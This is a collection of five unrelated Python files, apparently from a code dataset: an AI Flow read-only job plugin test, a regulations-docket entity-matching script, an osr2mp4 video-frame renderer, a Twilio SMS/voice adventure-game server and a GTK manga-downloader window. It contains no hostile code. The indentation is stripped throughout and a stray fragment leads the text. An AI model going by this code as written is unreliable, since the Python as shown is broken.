assert result.ret == 0
|
test_read_only_job_plugin.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import time
import unittest
from threading import Thread
from unittest import mock
from ai_flow.workflow.job import Job
from ai_flow.workflow.status import Status
from ai_flow import DatasetMeta
from ai_flow.ai_graph.ai_node import AINode, ReadDatasetNode, WriteDatasetNode
from ai_flow.workflow.job_config import JobConfig
from ai_flow.ai_graph.ai_graph import AISubGraph
from ai_flow_plugins.job_plugins.bash import BashProcessor
from ai_flow_plugins.job_plugins.read_only import ReadOnlyProcessor, ReadOnlyJobGenerator, ReadOnlyJob, \
ReadOnlyJobController, ReadOnlyJobHandle
class TestReadOnlyJobGenerator(unittest.TestCase):
def test_generate_throw_unknown_type_exception(self):
sub_graph = AISubGraph(JobConfig())
ai_node = AINode(processor=BashProcessor('hello'))
sub_graph.add_node(ai_node)
sub_graph.add_node(AINode(processor=ReadOnlyProcessor()))
job_generator = ReadOnlyJobGenerator()
with self.assertRaises(TypeError):
job_generator.generate(sub_graph)
def test_generate(self):
sub_graph = AISubGraph(JobConfig())
sub_graph.add_node(ReadDatasetNode(dataset=DatasetMeta("test"), processor=ReadOnlyProcessor()))
sub_graph.add_node(AINode(processor=ReadOnlyProcessor()))
sub_graph.add_node(WriteDatasetNode(dataset=DatasetMeta("test"), processor=ReadOnlyProcessor()))
job_generator = ReadOnlyJobGenerator()
job = job_generator.generate(sub_graph)
self.assertIsInstance(job, ReadOnlyJob)
def test_generate_with_required_configs(self):
job_config = JobConfig()
sub_graph = AISubGraph(job_config)
sub_graph.add_node(ReadDatasetNode(dataset=DatasetMeta("test"), processor=ReadOnlyProcessor()))
sub_graph.add_node(AINode(processor=ReadOnlyProcessor()))
sub_graph.add_node(WriteDatasetNode(dataset=DatasetMeta("test"), processor=ReadOnlyProcessor()))
job_generator = ReadOnlyJobGenerator(required_properties={'required_key'})
with self.assertRaises(RuntimeError):
job_generator.generate(sub_graph)
job_config.properties['required_key'] = 'value'
job = job_generator.generate(sub_graph)
self.assertIsInstance(job, ReadOnlyJob)
class TestReadOnlyJobController(unittest.TestCase):
def setUp(self) -> None:
self.job_controller = ReadOnlyJobController()
self.job = ReadOnlyJob(JobConfig("test_job"))
def test_submit_job(self):
job_runtime_env = mock.Mock()
job_execution_info = mock.Mock()
job_runtime_env.job_execution_info = job_execution_info
handle = self.job_controller.submit_job(self.job, job_runtime_env)
self.assertIsInstance(handle, ReadOnlyJobHandle)
self.assertEqual(self.job, handle.job)
self.assertEqual(job_execution_info, handle.job_execution)
def test_stop_job(self):
job_runtime_env = mock.Mock()
job_execution_info = mock.Mock()
job_runtime_env.job_execution_info = job_execution_info
with self.assertRaises(RuntimeError):
self.job_controller.stop_job(ReadOnlyJobHandle(mock.Mock(), job_execution_info), job_runtime_env)
handle = self.job_controller.submit_job(self.job, job_runtime_env)
self.assertFalse(self.job_controller._job_stop_events[handle.job].is_set())
self.job_controller.stop_job(handle, job_runtime_env)
self.assertTrue(self.job_controller._job_stop_events[handle.job].is_set())
def test_get_result(self):
job_runtime_env = mock.Mock()
job_execution_info = mock.Mock()
job_runtime_env.job_execution_info = job_execution_info
with self.assertRaises(RuntimeError):
self.job_controller.get_result(ReadOnlyJobHandle(mock.Mock(), job_execution_info), job_runtime_env)
handle = self.job_controller.submit_job(self.job, job_runtime_env)
self.assertIsNone(self.job_controller.get_result(handle, False))
def get_result():
result = self.job_controller.get_result(handle, True)
self.assertIsNone(result)
self.assertTrue(self.job_controller._job_stop_events[handle.job].is_set())
t = Thread(target=get_result)
t.start()
time.sleep(0.5)
self.job_controller.stop_job(handle, job_runtime_env)
t.join()
def test_get_job_status(self):
job_runtime_env = mock.Mock()
job_execution_info = mock.Mock()
job_runtime_env.job_execution_info = job_execution_info
with self.assertRaises(RuntimeError):
self.job_controller.get_job_status(ReadOnlyJobHandle(mock.Mock(), job_execution_info))
handle = self.job_controller.submit_job(self.job, job_runtime_env)
self.assertEqual(Status.RUNNING, self.job_controller.get_job_status(handle))
def test_obtain_job_label(self):
job_runtime_env = mock.Mock()
job_execution_info = mock.Mock()
job_runtime_env.job_execution_info = job_execution_info
with self.assertRaises(RuntimeError):
self.job_controller.obtain_job_label(ReadOnlyJobHandle(mock.Mock(), job_execution_info))
handle = self.job_controller.submit_job(self.job, job_runtime_env)
self.assertEqual("", self.job_controller.obtain_job_label(handle))
def test_obtain_job_label_check_job_type(self):
job_runtime_env = mock.Mock()
job_execution_info = mock.Mock()
job_runtime_env.job_execution_info = job_execution_info
job = Job(mock.Mock())
handle = self.job_controller.submit_job(job, job_runtime_env)
with self.assertRaises(TypeError):
self.job_controller.obtain_job_label(handle)
|
match_text.py
|
GEVENT = False
import zlib
import datetime
import settings
import pymongo
import traceback
import os
import re
import multiprocessing
from Queue import Empty
from regs_models import *
from oxtail.matching import match
# arguments
from optparse import OptionParser
arg_parser = OptionParser()
arg_parser.add_option("-a", "--agency", dest="agency", action="store", type="string", default=None, help="Specify an agency to which to limit the dump.")
arg_parser.add_option("-d", "--docket", dest="docket", action="store", type="string", default=None, help="Specify a docket to which to limit the dump.")
arg_parser.add_option("-A", "--all", dest="process_all", action="store_true", default=False, help="Force a re-extraction of all documents in the system.")
arg_parser.add_option("-m", "--multi", dest="multi", action="store", type="int", default=multiprocessing.cpu_count(), help="Set number of worker processes. Defaults to number of cores if not specified.")
# regex to find titles that are likely to have submitter names
NAME_FINDER = re.compile(r"^(public )?(comment|submission)s? (by|from) (?P<name>.*)$", re.I)
def get_text(view):
if not view.content:
return ''
return view.content.read()
def process_doc(doc):
# entity extraction
for view in doc.views:
if view.extracted == 'yes':
view_matches = match(get_text(view), multiple=True)
view.entities = list(view_matches.keys()) if view_matches else []
for attachment in doc.attachments:
for view in attachment.views:
if view.extracted == 'yes':
view_matches = match(get_text(view), multiple=True)
view.entities = list(view_matches.keys()) if view_matches else []
# submitter matches
# check if there's submitter stuff in the title
title_match = NAME_FINDER.match(doc.title)
# next check details, which is where most title stuff lives
details = doc.details
# stick "XXXX" between tokens because it doesn't occur in entity names
submitter_matches = match(' XXXX '.join([
# organization
details.get('Organization_Name', ''),
# submitter name
' '.join(
filter(bool, [details.get('First_Name', ''), details.get('Last_Name', '')])
),
# submitter representative
details.get('Submitter_s_Representative', ''),
# title_match if we found one
title_match.groupdict()['name'] if title_match else '',
# just examine the whole title if it's from SEC or CFTC; the title is basically always submitter info
doc.title if doc.source == 'sec_cftc' and doc.type in ('public_submission', 'other') else ''
]))
doc.submitter_entities = list(submitter_matches.keys()) if submitter_matches else []
doc.entities_last_extracted = datetime.datetime.now()
doc.save()
return True
def process_worker(todo_queue):
pid = os.getpid()
print '[%s] Worker started.' % pid
while True:
try:
doc = Doc._from_son(todo_queue.get())
except Empty:
print '[%s] Processing complete.' % pid
return
try:
doc_success = process_doc(doc)
print '[%s] Processing of doc %s succeeded.' % (pid, doc.id)
except:
print '[%s] Processing of doc %s failed.' % (pid, doc.id)
traceback.print_exc()
todo_queue.task_done()
def run(options, args):
from regs_common.entities import load_trie_from_mongo
import time
pid = os.getpid()
# load trie from the mongo database
import_start = time.time()
print '[%s] Loading trie...' % pid
load_trie_from_mongo()
print '[%s] Loaded trie in %s seconds.' % (pid, time.time() - import_start)
query = {'deleted': False, 'scraped': 'yes', '$nor': [{'views.extracted': 'no'},{'attachments.views.extracted':'no'}]}
if options.agency:
query['agency'] = options.agency
if options.docket:
query['docket_id'] = options.docket
if not options.process_all:
query['entities_last_extracted'] = {'$exists': False}
cursor = Doc.objects(__raw__=query)
run_start = time.time()
print '[%s] Starting analysis...' % pid
num_workers = options.multi
todo_queue = multiprocessing.JoinableQueue(num_workers * 3)
processes = []
for i in range(num_workers):
proc = multiprocessing.Process(target=process_worker, args=(todo_queue,))
proc.start()
processes.append(proc)
for doc in cursor:
todo_queue.put(doc.to_mongo())
todo_queue.join()
for proc in processes:
print 'Terminating worker %s...' % proc.pid
proc.terminate()
print '[%s] Completed analysis in %s seconds.' % (pid, time.time() - run_start)
|
CreateFrames.py
|
import ctypes
import time
import cv2
from multiprocessing import Process, Pipe
from multiprocessing.sharedctypes import RawArray
from osr2mp4 import logger
from osr2mp4.VideoProcess.Draw import draw_frame, Drawer
from osr2mp4.VideoProcess.FrameWriter import write_frame, getwriter
import os
def update_progress(framecount, deltatime, videotime):
pass
def create_frame(settings, beatmap, replay_info, resultinfo, videotime, showranking):
logger.debug('entering preparedframes')
if settings.process >= 1:
shared_array = []
shared_pipe = []
drawers = []
writers = []
start_index, end_index = videotime
osr_interval = int((end_index - start_index) / settings.process)
start = start_index
my_file = open(os.path.join(settings.temp, "listvideo.txt"), "w")
for i in range(settings.process):
if i == settings.process - 1:
end = end_index
else:
end = start + osr_interval
shared = RawArray(ctypes.c_uint8, settings.height * settings.width * 4)
conn1, conn2 = Pipe()
# extract container
_, file_extension = os.path.splitext(settings.output)
f = "output" + str(i) + file_extension
vid = (start, end)
drawer = Process(target=draw_frame, args=(
shared, conn1, beatmap, replay_info, resultinfo, vid, settings, showranking and i == settings.process-1))
writer = Process(target=write_frame, args=(shared, conn2, settings.temp + f, settings, i == settings.process-1))
shared_array.append(shared)
shared_pipe.append((conn1, conn2))
drawers.append(drawer)
writers.append(writer)
my_file.write("file '{}'\n".format(f))
logger.debug("Starting process")
drawer.start()
logger.debug("Start drawer {}".format(i))
writer.start()
logger.debug("Start writer {}".format(i))
start += osr_interval
my_file.close()
return drawers, writers, shared_pipe, shared_array
else:
from osr2mp4.VideoProcess.AFrames import PreparedFrames
from osr2mp4.CheckSystem.mathhelper import getunstablerate
import numpy as np
logger.debug("process start")
ur = getunstablerate(resultinfo)
frames = PreparedFrames(settings, beatmap.diff, replay_info.mod_combination, ur=ur, bg=beatmap.bg, loadranking=showranking)
shared = RawArray(ctypes.c_uint8, settings.height * settings.width * 4)
drawer = Drawer(shared, beatmap, frames, replay_info, resultinfo, videotime, settings)
_, file_extension = os.path.splitext(settings.output)
f = os.path.join(settings.temp, "outputf" + file_extension)
buf = np.zeros((settings.height * settings.width * 3), dtype=np.uint8)
writer = getwriter(f, settings, buf)
buf = buf.reshape((settings.height, settings.width, 3))
logger.debug("setup done")
framecount = 0
startwritetime = time.time()
while drawer.frame_info.osr_index < videotime[1]:
status = drawer.render_draw()
if status:
cv2.cvtColor(drawer.np_img, cv2.COLOR_BGRA2RGB, dst=buf)
if not settings.settings["Use FFmpeg video writer"]:
writer.write(buf)
else:
writer.write()
framecount += 1
if framecount % 100 == 0:
filewriter = open(os.path.join(settings.temp, "speed.txt"), "w")
deltatime = time.time() - startwritetime
filewriter.write("{}\n{}\n{}\n{}".format(framecount, deltatime, f, startwritetime))
filewriter.close()
update_progress(framecount, deltatime, videotime)
if showranking:
for x in range(int(5 * settings.fps)):
drawer.draw_rankingpanel()
cv2.cvtColor(drawer.np_img, cv2.COLOR_BGRA2RGB, dst=buf)
if not settings.settings["Use FFmpeg video writer"]:
writer.write(buf)
else:
writer.write()
writer.release()
logger.debug("\nprocess done")
return None, None, None, None
|
server.py
|
from __future__ import print_function
# Copyright (c) 2016-2021 Twilio Inc.
import os
import threading
import time
try: # Python 3
from queue import Queue
except ImportError: # Python 2
from Queue import Queue
import psycopg2
dburl = os.getenv('DATABASE_URL')
if not dburl:
dburl = 'dbname=test user=cswenson'
conn = psycopg2.connect(dburl)
cur = conn.cursor()
try:
cur.execute("""
CREATE TABLE IF NOT EXISTS adventure (
num VARCHAR(32) PRIMARY KEY,
state BYTEA,
created TIMESTAMP WITH TIME ZONE DEFAULT NOW(),
modified TIMESTAMP WITH TIME ZONE DEFAULT NOW());
""")
conn.commit()
except Exception:
pass
cur.close()
from twilio import twiml
from flask import Flask, request, jsonify, Request
from werkzeug.datastructures import ImmutableOrderedMultiDict
from interpret import Game
class MyRequest(Request):
"""Request subclass to override request parameter storage"""
parameter_storage_class = ImmutableOrderedMultiDict
class MyFlask(Flask):
"""Flask subclass using the custom request class"""
request_class = MyRequest
app = MyFlask(__name__)
class TwilioHandler(object):
def __init__(self):
self.outqueue = Queue()
self.inqueue = Queue()
def read(self):
return self.inqueue.get()
def write(self, data):
self.outqueue.put(data)
sid = os.getenv('TWILIO_SID')
token = os.getenv('TWILIO_TOKEN')
from_num = os.getenv('TWILIO_NUMBER')
states = {}
def run_for(from_, inp):
try:
cur = conn.cursor()
inp = str(inp).upper().strip()
inp = inp[:20] # commands shouldn't be longer than this
cur.execute("SELECT state FROM adventure WHERE num = %s", (from_,))
row = cur.fetchone()
exists = row is not None
ignore_input = False
new_game = False
if inp in ('RESET', 'QUIT', 'PURGE'):
if from_ in states:
del states[from_]
exists = False # force a reset
cur.execute("DELETE FROM adventure WHERE num = %s", (from_,))
elif inp == 'PURGE':
resp = twiml.Response()
text = 'Your data has been purged from the database. Text back to start a new game in the future if you like.'
resp.message(text)
return str(resp)
if not exists:
print('starting new game for', from_)
handler = TwilioHandler()
game = Game(handler)
t = threading.Thread(target=game.go)
t.daemon = True
t.start()
states[from_] = [handler, game, t]
ignore_input = True
new_game = True
if exists and from_ not in states:
# load from backup
handler = TwilioHandler()
game = Game(handler)
t = threading.Thread(target=game.go)
t.daemon = True
t.start()
states[from_] = [handler, game, t]
# wait for it to boot
while not game.waiting():
time.sleep(0.001)
# empty the queues
while not handler.outqueue.empty():
handler.outqueue.get_nowait()
game.setstate(row[0])
states[from_] = [handler, game, t]
handler, game, _ = states[from_]
if not ignore_input:
handler.inqueue.put(inp)
time.sleep(0.001)
while not game.waiting():
time.sleep(0.001)
text = ''
while not text:
while not handler.outqueue.empty():
text += handler.outqueue.get()
time.sleep(0.001)
# now save the game state to the database
state = game.getstate()
if exists:
cur.execute("UPDATE adventure SET state = %s, modified = NOW() WHERE num = %s", (psycopg2.Binary(state), from_))
else:
cur.execute("INSERT INTO adventure (num, state) VALUES (%s,%s)", (from_, psycopg2.Binary(state)))
conn.commit()
if new_game:
text = 'Welcome to Adventure! Type RESET or QUIT to restart the game. Type PURGE to be removed from our database.\n\n' + text
return text
finally:
cur.close()
@app.route("/incoming-voice", methods=['GET', 'POST'])
def voice_reply():
print('Form', request.form)
from_ = request.form['DialogueSid'][2:34]
inp = ''
if 'Field_word1_Value' in request.form:
inp += ' ' + request.form.getlist('Field_word1_Value')[-1]
if 'Field_word2_Value' in request.form and len((request.values.get('CurrentInput') or '').split(' ')) > 1:
inp += ' ' + request.form.getlist('Field_word2_Value')[-1]
inp = inp.strip()[:20]
if inp == '':
inp = request.values.get('CurrentInput') or ''
inp = inp.strip().upper().replace('.', '').replace(',', '')
inp = str(inp)
print('Recognized input %s' % inp)
text = run_for(from_, inp)
print('Output %s' % text)
actions = []
if inp:
text = 'I heard ' + inp + '. ' + text
actions.append({'say': {'speech': text}})
actions.append({'listen': True})
resp = {'actions': actions}
return jsonify(resp)
@app.route("/incoming-sms", methods=['GET', 'POST'])
def sms_reply():
from_ = str(request.values.get('From'))
inp = str(request.values.get('Body', ''))
text = run_for(from_, inp)
resp = twiml.Response()
resp.message(text)
return str(resp)
@app.route('/')
def hello_world():
return 'Hello, World!'
|
MainWindow.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#===============================================================================#
#title :MainWindow.py #
#description :Defines the MainWidow for gtk. #
#author :August B. Sandoval (asandova) #
#date :2020-3-2 #
#version :0.3 #
#usage :defines a custom gkt window #
#notes : #
#python_version :3.6.9 #
#===============================================================================#
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk as gtk,GLib as glib, GObject
GObject.threads_init()
glib.threads_init()
import os, shutil, threading, re, sys, traceback
from src.controller import control
from src.MangaPark import MangaPark_Source
from src.TitleSource import TitleSource
from gtk3.ChapterListRow import ChapterListBoxRow
from gtk3.TitleListBoxRow import TitleListBoxRow
from gtk3.Viewer import Viewer
from gtk3.GUI_Popups import Error_Popup, Warning_Popup, Info_Popup, add_Popup, About_Popup, ask_Popup
class MainWindow(control, gtk.Window):
def __init__(self, UI_Main, UI_Viewer, UI_Add_Dialog, *args, **kwargs):
gtk.Window.__init__(self, *args, **kwargs)
control.__init__(self)
self.__spinner_status = False
self.builder = gtk.Builder()
self.builder.add_from_file(UI_Main+".glade")
self.About = None
self.entered_url = None
self.UI_Viewer = UI_Viewer
self.UI_Add = UI_Add_Dialog
self.Widgets["Main Window"] = self.builder.get_object("Main_Window")
self.Widgets["Chapter Viewer"] = None
self.Widgets["Info Viewer"] = self.builder.get_object("Manga_info_viewer")
self.Widgets["Status Spinner"] = self.builder.get_object("Status_Spinner")
self.Widgets["Status Label"] = self.builder.get_object("Status_Label")
self.Widgets["Title Label"] = self.builder.get_object("Manga_Title_Label" )
self.Widgets["Authors Label"] = self.builder.get_object("Manga_Author_Label")
self.Widgets["Artists Label"] = self.builder.get_object("Manga_Artist_label")
self.Widgets["Genre Label"] = self.builder.get_object("Manga_Genre_Label")
self.Widgets["Summary Label"] = self.builder.get_object("Summary_Data_Label")
self.Widgets["Stream Select"] = self.builder.get_object("Stream_Combo_Box")
self.Widgets["Cover"] = self.builder.get_object("Manga_Cover_Image")
self.Widgets["Chapter List Box"] = self.builder.get_object("Chapter_List")
self.Widgets["Title List"] = self.builder.get_object("Manga_List")
self.Widgets["Search Box"] = self.builder.get_object("Manga_Title_Search")
self.Widgets["Update Streams"] = self.builder.get_object("Update_Streams_Button")
self.Widgets["About"] = self.builder.get_object("About_Menu_Button")
self.Widgets["Link"] = self.builder.get_object("Manga_Link")
self.Widgets["Chapter Sort"] = self.builder.get_object("Sort_Toggle")
self.Widgets["Sort Image"] = self.builder.get_object("sort_button_image")
self.Widgets["Download all chapters Button"] = self.builder.get_object("download_all_button")
self.Widgets["Add Title"] = self.builder.get_object("Add_Manga_Menu_Button")
self.Widgets["Title Buttons"] = {}
self.Widgets["Main Window"].connect("delete-event", self._on_quit)
self.Widgets["Add Title"].connect("activate",self._on_menu_add)
self.Widgets["Update Streams"].connect("clicked",self._on_update)
self.Widgets["Download all chapters Button"].set_sensitive(True)
self.Widgets["Download all chapters Button"].set_tooltip_text("Download all chapters in current stream list")
self.Widgets["Download all chapters Button"].connect("clicked", self._on_download_all)
self.Widgets["Search Box"].connect("search-changed",self._on_search_change)
self.Widgets["Stream Select"].connect("changed",self._on_stream_change)
self.Widgets["Title List"].connect("row_selected",self._on_list_select)
self.Widgets["Title List"].connect("selected-rows-changed",self._on_list_select)
self.Widgets["About"].connect("activate", self.about)
self.Widgets["Chapter Sort"].connect("clicked", self._on_sort)
self.Widgets["Sort Image"].set_from_icon_name("gtk-sort-descending", 1)
self.Widgets["Chapter Sort"].set_tooltip_text("set to descending order")
self.Widgets["Main Window"].show()
self._get_title_list_from_file()
self._load_title_entry()
def add_title_entry(self,name):
row = TitleListBoxRow(name)
row.show()
self.Widgets["Title Buttons"][row] = name
index = self._find_insertion_point(name)
row.connect("remove_row", self._on_remove)
self.Widgets["Title List"].insert(row, index)
if self.Widgets["Title List"].props.visible == False:
self.Widgets["Title List"].show()
def title_exist(self, name):
for t in self.Title_Dict.keys():
if t == name:
return True
return False
def update_status(self, turn_on, message=None):
if turn_on == True and self.__spinner_status == False:
self.__spinner_status = True
self.Widgets["Status Spinner"].start()
elif turn_on == False and self.__spinner_status == True:
self.__spinner_status = False
self.Widgets["Status Spinner"].stop()
if message != None:
self.Widgets["Status Label"].set_label(message)
def _find_insertion_point(self, title):
rows = list(self.Widgets["Title Buttons"].values())
rows.append(title)
rows.sort()
for i in range(0,len(rows)):
if rows[i] == title:
return i
def _is_chapter_visable(self, title, stream, chapter ):
chapter_hash = hash( (title, stream, chapter) )
for i in range(0, len(self.Chapter_List) ):
if chapter_hash == hash(self.Chapter_List[i]):
return self.Chapter_List[i]
return None
def _load_title_entry(self):
self.update_status(True, "Loading Title List.....")
for m in self.Title_Dict.keys():
self.add_title_entry(m)
self.Widgets["Title List"].show()
self.update_status(False,"Loaded Title List")
def _on_remove_chapter(self, chapter_row):
print(chapter_row.is_downloaded())
if chapter_row.is_downloaded() == True:
print(chapter_row.chapter_path+'/'+chapter_row.chapter.directory+ '.zip')
if os.path.isfile(chapter_row.chapter_path+'/'+chapter_row.chapter.directory+ '.zip') == True:
os.remove(chapter_row.chapter_path+'/'+chapter_row.chapter.directory+ '.zip')
chapter_row.update_state("download", "Download", "Download " + str(chapter_row.chapter), True)
chapter_row.update_state("remove", "Remove","Chapter " + str(chapter_row.chapter)+ " is not downloaded")
chapter_row.update_state("view", "View", "Download " + str(chapter_row.chapter) + " before viewing")
chapter_row.set_is_downloaded(False)
def _on_sort(self, widget):
self._sort = not self._sort
if self._sort == True:
self.Widgets["Chapter Sort"].set_tooltip_text("set to descending order")
self.Widgets["Sort Image"].set_from_icon_name("gtk-sort-descending",1)
else:
self.Widgets["Sort Image"].set_from_icon_name("gtk-sort-ascending",1)
self.Widgets["Chapter Sort"].set_tooltip_text("set to ascending order")
self._update_chapter_list()
def _on_update(self, widget):
status = self._check_all_selections()
if status <= 2:
self.update_status(True,"Updating : " + self.selection["Title"].get_title())
updater = threading.Thread( target=self._update_runner, args=(self.selection["Title"],) )
updater.daemon = True
updater.start()
else:
popup = Warning_Popup(self,"No Stream Selected")
popup.run()
popup.destroy()
def _update_title_details(self):
if self.selection["Title"] != None:
self.Widgets["Cover"].clear()
if os.path.isfile(self.selection["Title"].get_cover_location()) == False:
self.Widgets["Cover"].set_from_icon_name("gtk-missing-image", 30)
else:
self.Widgets["Cover"].set_from_file(self.selection["Title"].get_cover_location())
self.Widgets["Title Label"].set_label(self.selection["Title"].get_title())
self.Widgets["Authors Label"].set_label( "Author(s): " + self.selection["Title"].get_Authors_str())
self.Widgets["Artists Label"].set_label("Artist(s): " + self.selection["Title"].get_Artists_str())
self.Widgets["Genre Label"].set_label("Genre(s): " + self.selection["Title"].get_Genres_str())
self.Widgets["Summary Label"].set_label(self.selection["Title"].get_summary())
self.Widgets["Link"].set_uri(self.selection["Title"].site_url)
self.Widgets["Link"].set_label("Visit Site")
if( self.Widgets["Info Viewer"].props.visible == False ):
self.Widgets["Info Viewer"].show()
else:
self.Widgets["Info Viewer"].hide()
def _check_all_selections(self):
if self.selection["Title"] != None:
if self.selection["Stream"] != None:
if self.selection["Chapter"] != None:
return 0
else:
return 1 # no chapter selected
else:
return 2 # no stream selected
else:
return 3 # no Title selected
# Signal callback methods ---------------------------------------------------------------#
def about(self, widget):
self.About = About_Popup(self)
def _on_download(self, title, stream, chapter, location):
id = hash( (title, stream, chapter) )
if self.in_chapter_queue( id ) == False:
self.ChapterQueue.appendleft( (title, stream, chapter, location, id) )
if self.threads["Chapter"] == None:
self.threads["Chapter"] = threading.Thread( target=self._download_chapter_runner )
self.threads["Chapter"].start()
else:
self.update_status( True, "Downloading " + title.get_title() + " Chapter " + str(chapter.get_chapter_number()) + "\nChapters Queued " + str( len(self.ChapterQueue) ) )
def _on_download_all(self, widget):
for c in self.selection["Stream"].get_chapters():
path = self.selection["Title"].save_location + "/" + self.selection["Title"].get_directory() +'/'+ self.selection["Stream"].get_directory()
if c.is_downloaded(path) == False:
self._on_download( self.selection["Title"],self.selection["Stream"], c, path )
self._update_chapter_list()
def _on_menu_add(self, widget):
Entry_popup = add_Popup(self, self.UI_Add )
response = Entry_popup.run()
if response == gtk.ResponseType.OK:
pattern = re.compile(r"\s")
self.entered_url = re.subn(pattern,"", self.entered_url)[0]
urls = self.entered_url.split(',')
for u in urls:
if u == "" or u == None:
error = Error_Popup(self,"Invalid","Invalid site domain")
error.run()
error.destroy()
else:
domain = TitleSource.find_site_domain( u )
if domain == 'mangapark.net' or domain == 'www.mangapark.net':
title = MangaPark_Source()
self.TitleQueue.appendleft( (title, u) )
if self.threads["Title"] == None:
self.threads["Title"] = threading.Thread(target=self._add_title_from_url_runner)
self.threads["Title"].start()
elif domain == None:
error = Error_Popup(self,"Invalid","Invalid site domain")
error.run()
error.destroy()
else:
error = Error_Popup(self,"Unsupported Manga Site", domain + " is currently not supported")
error.run()
error.destroy()
elif response == gtk.ResponseType.CANCEL:
self.entered_url = ""
Entry_popup.destroy()
def _on_quit(self, widget, data):
if self.threads["Chapter"] != None or self.threads["Stream"] != None or self.threads["Title"] != None:
popup = ask_Popup(self, "Active Downloads", "Do you wish to stop downloads?")
responce = popup.run()
popup.destroy()
if responce == gtk.ResponseType.CANCEL:
print("Cancel pressed")
return True
else:
self.update_status(True, "Canceling Downloads")
self._KillThreads = True
if self.threads["Chapter"] != None:
self.threads["Chapter"].join()
if self.threads["Stream"] != None:
self.threads["Stream"].join()
if self.threads["Title"] != None:
self.threads["Title"].join()
self._export_title_list_to_file()
self.update_status(False)
gtk.main_quit()
else:
self.update_status(True, "exporting Title List")
self._export_title_list_to_file()
self.update_status(False)
gtk.main_quit()
def _on_list_select(self, widget, data=None):
if data != None:
data = widget.get_selected_row()
self.selection["Title"] = self.Title_Dict[ self.Widgets["Title Buttons"][data] ]
self.selection["Stream"] = None
self._update_title_details()
self._update_stream_dropdown()
def _on_remove(self, widget, data):
key = self.Widgets["Title Buttons"][data]
del self.Widgets["Title Buttons"][data]
self.Widgets["Title List"].remove(data)
manga_to_delete = self.Title_Dict[key]
location = manga_to_delete.save_location +'/' + manga_to_delete.directory
if os.path.isdir(location) == True:
shutil.rmtree(location)
del self.Title_Dict[key]
if manga_to_delete == self.selection["Title"]:
self.selection["Title"] = None
self._update_title_details()
def _on_search_change(self, widget):
text = widget.get_text()
if text == "":
for m in self.Widgets["Title Buttons"]:
m.show()
else:
text = text.lower()
pattern = re.compile( '(' + text + ')' )
for m in self.Widgets["Title Buttons"]:
if re.search(pattern,m.get_text().lower()) != None:
m.show()
else:
m.hide()
def _on_stream_change(self, widget):
self.selection["Stream"] = self.selection["Title"].get_stream_with_name(widget.get_active_text())
if self.selection["Stream"] == None:
entry = self.Widgets["Stream Select"].get_child()
entry.set_text("")
self._update_chapter_list()
def _on_view(self, number, location):
self.selection["Chapter"] = self.selection["Stream"].get_chapter(number)
v = Viewer.get_instance( self.selection["Title"], self.selection["Stream"], self.selection["Chapter"] )
if v != None:
popup = Info_Popup(self,"Viewer open","A viewer for this chapter is already open")
popup.run()
popup.destroy()
else:
Viewer(self,self.UI_Viewer,self.selection["Title"], self.selection["Stream"], self.selection["Chapter"],location)
def _update_chapter_list(self):
if self.selection["Stream"] != None:
if len(self.Chapter_List) > 0:
for r in self.Chapter_List:
self.Widgets["Chapter List Box"].remove(r)
self.Chapter_List = []
chapters = self.selection["Stream"].get_chapters()
if self._sort == True :
chapters.sort(reverse=True)
else:
chapters.sort(reverse=False)
for i in range(0, len(chapters)):
row = ChapterListBoxRow(self,
self.selection["Title"],
self.selection["Stream"],
chapters[i],
downloadCommand=self._on_download,
removeCommand= self._on_remove_chapter,
viewCommand=self._on_view
)
self.Chapter_List.append(row)
self.Widgets["Chapter List Box"].insert(row, i)
else:
if len(self.Chapter_List) > 0:
for r in self.Chapter_List:
self.Widgets["Chapter List Box"].remove(r)
self.Chapter_List = []
def _update_stream_dropdown(self):
if self.selection["Title"] != None:
self.Widgets["Stream Select"].remove_all()
for s in self.selection["Title"].get_streams():
self.Widgets["Stream Select"].append_text(s.get_name())
# Thread worker methods -----------------------------------------------------------------#
def _add_title_from_url_runner( self):
while len( self.TitleQueue ) > 0:
if self._KillThreads == True:
return
self._current_task["Title"] = self.TitleQueue.pop()
title = self._current_task["Title"][0]
url = self._current_task["Title"][1]
glib.idle_add(self.update_status, True , "Fetching title from " + url)
code = title.request_manga(url)
if code != 0:
error = Error_Popup(self, "Failed to Connect", "HTML Error " + str(code))
error.run()
error.destroy()
else:
try:
glib.idle_add(self.update_status, True , "Extracting : " + url)
title.extract_manga()
glib.idle_add(self.update_status,False, "Extraction Complete")
if self.title_exist(title.get_title() ) == False:
self.add_title_entry(title.get_title())
self.Title_Dict[title.get_title()] = title
title.to_json_file(title.save_location)
glib.idle_add(self.update_status, False, "Sucsessfully added: " + title.get_title())
else:
glib.idle_add(self.update_status, False, title.get_title() + " already exists")
except:
glib.idle_add(self.update_status, False, "Failed to extract title from url: " + url)
self.threads["Title"] = None
self._current_task["Title"] = None
def _download_chapter_runner(self):
while len(self.ChapterQueue) > 0:
if self._KillThreads == True:
return
self._current_task["Chapter"] = self.ChapterQueue.pop()
title = self._current_task["Chapter"][0]
stream = self._current_task["Chapter"][1]
chapter = self._current_task["Chapter"][2]
row = self._is_chapter_visable( title, stream, chapter )
if row != None:
GObject.idle_add( row.update_state,"download", "Downloading...", "Chapter is downloading", False, True )
GObject.idle_add( self.update_status, True,"Downloading " + title.get_title() + " Chapter " + str(chapter.get_chapter_number()) + "\nChapters Queued " + str( len(self.ChapterQueue) ) )
code = title.Download_Manga_Chapter( stream.get_id(),chapter.get_chapter_number(), self._current_task["Chapter"][3], self._KillThreads )
row = self._is_chapter_visable( title, stream, chapter )
if code != 0:
GObject.idle_add(self.update_status,False, "Failed to download:\n" + str(chapter) )
if row != None:
GObject.idle_add(row.update_state,"download","Download", True, False)
else:
self.update_status(False, "Download of " + title.get_title() + "\n" + str(chapter) + " --- Completed")
if row != None:
GObject.idle_add(row.update_state,"download", "Downloaded","Chapter "+ str(chapter.get_chapter_number()) + " is already downloaded",False, False)
GObject.idle_add(row.update_state,"view", "view", "View chapter "+ str(chapter.get_chapter_number()),True, False)
